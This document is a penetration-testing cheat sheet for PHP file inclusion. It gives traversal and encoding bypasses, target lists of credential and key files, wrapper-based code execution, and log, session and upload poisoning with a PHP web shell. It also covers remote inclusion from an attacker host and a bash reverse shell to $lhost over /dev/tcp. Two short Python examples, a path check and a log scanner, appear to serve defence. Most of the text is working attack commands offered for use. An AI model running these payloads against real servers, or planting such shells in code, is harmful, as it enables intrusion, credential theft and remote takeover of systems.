
# File Inclusion (LFI/RFI)

## Local File Inclusion (LFI)

### Quick Check (One-liner)

```bash
curl -s "http://$rhost/page.php?file=../../../etc/passwd" && curl -s "http://$rhost/page.php?file=php://filter/convert.base64-encode/resource=index.php"
```

### Basic LFI

Simple file inclusion:

```
http://$rhost/page.php?file=/etc/passwd
http://$rhost/page.php?page=/etc/passwd
http://$rhost/page.php?include=/etc/passwd
```

### Path Traversal

Directory traversal sequences:

```
../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%252f..%252f..%252fetc/passwd
```

Absolute path:

```
/etc/passwd
file:///etc/passwd
```

### Null Byte Injection

Bypass extension checks (PHP < 5.3.4, where a NUL byte truncates the path before the appended extension):

```
../../../etc/passwd%00
../../../etc/passwd%00.php
../../../etc/passwd\x00
```

### Double Encoding

Bypass WAF/filters with URL encoding:

```
%252e%252e%252f           # ../ (double URL encoding)
%252e%252e/               # ../
..%c0%af                  # ../ (overlong UTF-8 encoding of "/")
..%ef%bc%8f               # ../ (fullwidth solidus U+FF0F)
%c0%ae%c0%ae/             # ../ (overlong UTF-8 encoding of ".")
```

### Filter Bypass

Bypass `str_replace("../", "")` (the replacement runs once, so the characters left behind reassemble into `../`):

```
....//....//....//etc/passwd
..././..././..././etc/passwd
....\/....\/....\/etc/passwd
```

Bypass with path normalization:

```
/var/www/html/../../../etc/passwd
/var/www/images/../../../etc/passwd
```

Case variation (Windows):

```
....//....//....//WINDOWS/system.ini
```
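Why the one-pass `str_replace` filter above is bypassed by `....//`, and what canonicalisation plus a document-root check does instead, as an added Python example that is not part of the cheat sheet (the web root and allowlisted page names are assumed):

```python
import posixpath

WEB_ROOT = "/var/www/html"          # assumed document root for this example
ALLOWED_PAGES = {"home", "about"}   # assumed allowlist of includable pages

def naive_filter(user_path: str) -> str:
    """Mimics PHP's str_replace("../", ""): a single, non-recursive pass."""
    return user_path.replace("../", "")

def naive_resolve(user_path: str) -> str:
    """Filter, then join with the web root, the way a vulnerable include does."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, naive_filter(user_path)))

def safe_resolve(user_path: str):
    """Reject NUL bytes and scheme-like input (php://, data:, C:\\), canonicalise
    the joined path, and refuse anything that does not stay under WEB_ROOT.
    posixpath.normpath keeps this runnable offline; on a real filesystem use
    os.path.realpath so symlinks are resolved before the prefix check."""
    if "\x00" in user_path or ":" in user_path:
        return None
    # An absolute user_path makes join() discard WEB_ROOT; the prefix check catches that.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, user_path.replace("\\", "/")))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate

def allowlist_resolve(page: str):
    """Strictest option: map a bare page name onto a fixed path; no path syntax accepted."""
    return f"{WEB_ROOT}/pages/{page}.php" if page in ALLOWED_PAGES else None
```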

## Interesting Files

### Linux

System files:

```
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/resolv.conf
/etc/crontab
/etc/fstab
```

SSH keys:

```
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/home/$username/.ssh/id_rsa
~/.ssh/id_rsa
```

Apache/Nginx:

```
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/etc/apache2/sites-available/000-default.conf
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/var/www/html/.htaccess
```

Application configs:

```
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.env
/var/www/html/configuration.php
/var/www/html/settings.php
```

Proc filesystem:

```
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/status
/proc/version
/proc/net/tcp
/proc/net/arp
/proc/sched_debug
```

Mail and other logs:

```
/var/log/mail.log
/var/mail/www-data
/var/log/auth.log
/var/log/syslog
```

### Windows

System files:

```
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\win.ini
C:\Windows\system.ini
C:\Windows\debug\NetSetup.log
```

IIS logs and configuration:

```
C:\inetpub\logs\LogFiles\W3SVC1\
C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
```

Application files:

```
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\htdocs\config.php
C:\wamp\www\config.php
```

User files:

```
C:\Users\Administrator\Desktop\
C:\Users\Administrator\.ssh\id_rsa
C:\Users\$username\Documents\
```

## PHP Wrappers

### php://filter

Read source code (base64 encoded, so the PHP is returned instead of executed):

```
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=index.php
```

Read source code (rot13):

```
php://filter/read=string.rot13/resource=index.php
```

Read UTF-16 encoded:

```
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
```

Chain multiple filters:

```
php://filter/convert.base64-encode|convert.base64-decode/resource=index.php
```

### php://input

Execute PHP code supplied in the POST body (requires `allow_url_include=On`):

```http
POST /page.php?file=php://input HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded

<?php system($_GET['cmd']); ?>
```

Command execution:

```http
POST /page.php?file=php://input&cmd=id HTTP/1.1
Host: $rhost

<?php system($_GET['cmd']); ?>
```

### data://

Execute PHP code inline (requires `allow_url_include=On`):

```
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
```

Base64 encoded payload:

```bash
echo '<?php system($_GET["cmd"]); ?>' | base64
# PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
```

```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==&cmd=id
```

### expect://

Direct command execution (requires the `expect` PECL extension to be installed):

```
expect://id
expect://whoami
expect://ls+-la
```

### zip://

Execute PHP from a ZIP archive:

```bash
# Create malicious zip
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.zip shell.php
```

```
zip://shell.zip%23shell.php&cmd=id
zip:///var/www/html/uploads/shell.zip%23shell.php
```

### phar://

Execute PHP from a PHAR archive:

```bash
# Create phar (requires phar.readonly=Off)
php -d phar.readonly=0 create_phar.php
```

```
phar://shell.phar/shell.php&cmd=id
phar:///var/www/html/uploads/shell.phar/shell.php
```

## Log Poisoning

### Apache Logs

Inject PHP code via User-Agent:

```bash
curl -A "<?php system(\$_GET['cmd']); ?>" http://$rhost/
```

Include poisoned log:

```
http://$rhost/page.php?file=/var/log/apache2/access.log&cmd=id
http://$rhost/page.php?file=/var/log/apache/access.log&cmd=id
http://$rhost/page.php?file=/var/log/httpd/access_log&cmd=id
```

Common log paths:

```
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
```

### SSH Logs

Inject PHP via SSH username:

```bash
ssh '<?php system($_GET["cmd"]); ?>'@$rhost
```

Include poisoned SSH log:

```
http://$rhost/page.php?file=/var/log/auth.log&cmd=id
```

### Mail Logs

Send email with PHP payload:

```
telnet $rhost 25
EHLO attacker.com
MAIL FROM:<attacker@attacker.com>
RCPT TO:<?php system($_GET['cmd']); ?>
DATA
.
QUIT
```

Include mail log:

```
http://$rhost/page.php?file=/var/log/mail.log&cmd=id
http://$rhost/page.php?file=/var/mail/www-data&cmd=id
```

### Proc Environ

Include /proc/self/environ with poisoned User-Agent:

```bash
curl -A "<?php system(\$_GET['cmd']); ?>" "http://$rhost/page.php?file=/proc/self/environ&cmd=id"
```
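Detection side of the traversal encodings, wrapper schemes and log-poisoning User-Agents covered above: an added Python scanner for Apache combined-format access logs, not part of the cheat sheet. It percent-decodes repeatedly (so `%25` double encoding and mixed case collapse), maps the overlong and fullwidth slash encodings to `/`, then flags traversal, NUL bytes, stream wrappers and PHP tags in the User-Agent. The log lines are constructed sample input.

```python
import re
from urllib.parse import unquote
# Constructed Apache combined-format log lines (sample input, not from a real host).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?file=..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?file=....//....//....//etc/passwd%00.php HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?file=..%C0%AF..%C0%AFetc/passwd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.10 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 100 "-" "<?php system($_GET['cmd']); ?>"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Alternate encodings of "/" "." and "\" : overlong UTF-8 and the fullwidth solidus U+FF0F.
ALT_BYTES = {"%c0%af": "/", "%c0%ae": ".", "%c1%9c": "\\", "%ef%bc%8f": "/"}
WRAPPER_RE = re.compile(r"^(php|data|expect|zip|phar|file|ftp|https?):")

def normalize(value, rounds=3):
    """Lower-case, map alternate byte sequences, and percent-decode until stable."""
    v = value.lower()
    for _ in range(rounds):
        for enc, ch in ALT_BYTES.items():
            v = v.replace(enc, ch)
        decoded = unquote(v)
        if decoded == v:
            break
        v = decoded
    return v.replace("\\", "/")

def classify(line):
    """Return (ip, reasons) for one log line; an empty reasons list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparsed line"]
    reasons = []
    for param in m["target"].partition("?")[2].split("&"):
        name, _, raw = param.partition("=")
        val = normalize(raw)
        if "../" in val:
            reasons.append(f"{name}: directory traversal")
        if "\x00" in val:
            reasons.append(f"{name}: null byte")
        if WRAPPER_RE.match(val):
            reasons.append(f"{name}: stream wrapper")
    if "<?" in m["ua"]:
        reasons.append("user-agent: PHP tag (possible log poisoning)")
    return m["ip"], reasons

def scan(log_text):
    return [(ip, r) for ip, r in map(classify, log_text.splitlines()) if r]
```

Sensitive-path matching (`/etc/passwd`, `/proc/self/environ`, session directories) is the obvious next rule to add on top of the normalised value.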

## Session File Inclusion

Find session file location:

```
/var/lib/php/sessions/sess_<PHPSESSID>
/var/lib/php5/sessions/sess_<PHPSESSID>
/tmp/sess_<PHPSESSID>
C:\Windows\Temp\sess_<PHPSESSID>
```

Inject PHP in a session variable (only applies if the session stores user-controllable data):

```http
POST /profile.php HTTP/1.1
Cookie: PHPSESSID=abc123

username=<?php system($_GET['cmd']); ?>
```

Include poisoned session:

```
http://$rhost/page.php?file=/var/lib/php/sessions/sess_abc123&cmd=id
```

## Remote File Inclusion (RFI)

Basic RFI (requires `allow_url_include=On`):

```
http://$rhost/page.php?file=http://$lhost/shell.php
http://$rhost/page.php?file=http://$lhost/shell.txt
```

Bypass extension checks:

```
http://$rhost/page.php?file=http://$lhost/shell.php%00
http://$rhost/page.php?file=http://$lhost/shell.php?
http://$rhost/page.php?file=http://$lhost/shell.php#
```

Using SMB share (Windows):

```
http://$rhost/page.php?file=\\$lhost\share\shell.php
```

Host shell for RFI:

```bash
# shell.txt content
<?php system($_GET['cmd']); ?>

# Serve file
python3 -m http.server 80
```

## LFI to RCE

### Via Log Poisoning

```bash
# Step 1: Poison log with PHP code
curl -A "<?php system(\$_GET['cmd']); ?>" http://$rhost/

# Step 2: Include log and execute
curl "http://$rhost/page.php?file=/var/log/apache2/access.log&cmd=id"

# Step 3: Get reverse shell
curl "http://$rhost/page.php?file=/var/log/apache2/access.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F$lhost%2F$lport%200%3E%261'"
```

### Via PHP Session

```bash
# Step 1: Set session with PHP payload
curl -c cookies.txt "http://$rhost/login.php?username=<?php system(\$_GET['cmd']); ?>"

# Step 2: Get session ID (field 7 of the Netscape cookie file is the value)
SESSID=$(grep PHPSESSID cookies.txt | awk '{print $7}')

# Step 3: Include session file
curl "http://$rhost/page.php?file=/var/lib/php/sessions/sess_$SESSID&cmd=id"
```

### Via Proc Self Environ

```bash
curl -A "<?php system(\$_GET['cmd']); ?>" "http://$rhost/page.php?file=/proc/self/environ&cmd=id"
```

### Via File Upload

```bash
# Step 1: Upload image with PHP code in its EXIF comment
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

# Step 2: Include uploaded file
http://$rhost/page.php?file=uploads/image.jpg&cmd=id
```

### Via PHP Filters Chain

PHP filter chain for RCE without writing a file to disk.

Tool: https://github.com/synacktiv/php_filter_chain_generator

Install and generate payload:

```bash
git clone https://github.com/synacktiv/php_filter_chain_generator
cd php_filter_chain_generator

# Generate chain for command execution
python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'
```

Alternative: php_filter_chains_oracle_exploit

```bash
git clone https://github.com/synacktiv/php_filter_chains_oracle_exploit
python3 filters_chain_oracle_exploit.py --target "http://$rhost/page.php?file=" --parameter file --chain "<?php system(\$_GET['cmd']); ?>"
```

Use generated filter chain:

```
http://$rhost/page.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|..../resource=php://temp&cmd=id
```

Common php_filter_chain payload:

```bash
# Generate base64 shell command
python3 php_filter_chain_generator.py --chain '<?=`$_GET[c]`;?>'

# Use in LFI
http://$rhost/page.php?file=<GENERATED_CHAIN>&c=id
```

## See Also